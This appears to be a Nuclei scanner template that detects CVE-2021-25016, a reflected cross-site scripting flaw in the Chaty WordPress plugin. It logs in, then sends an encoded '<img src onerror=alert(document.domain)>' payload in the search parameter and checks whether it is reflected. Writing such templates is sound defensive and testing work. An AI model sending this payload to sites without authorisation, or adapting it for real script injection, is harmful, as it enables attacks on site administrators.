id: CVE-2021-25016

info:
  name: Chaty < 2.8.2 - Cross-Site Scripting
  author: luisfelipe146
  severity: medium
  description: |
    The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
  remediation: Fixed in 2.8.3
  reference:
    - https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25016
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25016
    cwe-id: CWE-79
    epss-score: 0.00106
    epss-percentile: 0.42986
    cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: premio
    product: chaty
    framework: wordpress
    publicwww-query: "/wp-content/plugins/chaty/"
  tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "search=</script><img src onerror=alert(document.domain)>"
          - "chaty_page_chaty"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c12284c4202d6e1f4da65cdeebffe1f8a15a76ff677037f4fe42c60f014a28eb02210088c0afed1d41e330d98bca6fb947f9617b88cfb01f0eac35bae254af9f67e068:922c64590222798bb761d5b6d8e72950